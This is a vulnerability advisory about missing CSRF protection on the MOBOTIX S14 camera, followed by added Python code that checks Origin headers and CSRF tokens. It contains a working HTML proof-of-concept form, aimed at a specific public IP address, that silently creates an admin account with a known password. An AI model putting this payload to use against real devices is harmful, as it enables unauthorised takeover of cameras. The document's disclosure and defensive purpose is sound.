Created
May 29, 2019 13:37
Summary
The MOBOTIX S14 camera did not implement any mechanism to prevent cross-site request forgery (CSRF) attacks.
Impact
Successful exploitation of this vulnerability can lead to the takeover of the device.
Details
The MOBOTIX S14 camera did not implement any mechanism to prevent cross-site request forgery attacks.
This can allow a local account password to be changed without the knowledge of the authenticated user.
PoC - the following PoC will add a test user with a password of 'aaaaa'. Note that this user has admin privileges.
<html>
<body>
<form method="POST" action="http://82.71.22.180:8001/admin/access">
<input type="hidden" name="user_name_0" value="admin"/>
<input type="hidden" name="user_group_0" value="admins"/>
<input type="hidden" name="user_passwd_a_0" value="***"/>
<input type="hidden" name="user_passwd_b_0" value="***"/>
<input type="hidden" name="user_name_1" value="rayspeed"/>
<input type="hidden" name="user_group_1" value="users"/>
<input type="hidden" name="user_passwd_a_1" value="***"/>
<input type="hidden" name="user_passwd_b_1" value="***"/>
<input type="hidden" name="user_name_2" value="test"/>
<input type="hidden" name="user_group_2" value="admins"/>
<input type="hidden" name="user_passwd_a_2" value="aaaaa"/>
<input type="hidden" name="user_passwd_b_2" value="aaaaa"/>
<input type="hidden" name="sv_passwd_a" value=""/>
<input type="hidden" name="sv_passwd_b" value=""/>
<input type="hidden" name="save_config" value="Set"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
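A server-side check that would reject the forged form post described above, as an added example (not code from the original advisory or from MOBOTIX): state-changing requests must carry a same-origin Origin/Referer header and a session-bound CSRF token. The function names, the csrf_token field and the camera.example origin are assumptions; the sample form fields mirror the PoC.

```python
import hashlib, hmac, secrets
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}

def issue_csrf_token(session_id: str, key: bytes) -> str:
    """Token bound to one session: nonce plus HMAC(key, session_id:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def token_valid(token: str, session_id: str, key: bytes) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce:
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())  # constant-time compare

def same_origin(headers: dict, allowed_origins: set) -> bool:
    """Compare Origin (or, failing that, Referer) with the device's own origins."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" in allowed_origins

def check_request(method, headers, form, session_id, key, allowed_origins):
    """Return (allowed, reason) for one request to an admin endpoint."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    if not same_origin(headers, allowed_origins):
        return False, "cross-origin or missing Origin/Referer"
    if not token_valid(form.get("csrf_token", ""), session_id, key):
        return False, "missing or invalid CSRF token"
    return True, "ok"

def demo():
    key, sid = secrets.token_bytes(32), "session-1234"   # constructed values
    origins = {"http://camera.example:8001"}              # placeholder device origin
    # Constructed form body using field names from the PoC (subset).
    forged = {"user_name_2": "test", "user_group_2": "admins", "save_config": "Set"}
    legit = dict(forged, csrf_token=issue_csrf_token(sid, key))
    own = {"Origin": "http://camera.example:8001"}
    return [
        check_request("POST", {"Origin": "http://other-site.example"}, forged, sid, key, origins),
        check_request("POST", own, forged, sid, key, origins),  # same origin, no token
        check_request("POST", own, legit, sid, key, origins),   # same origin, valid token
    ]
```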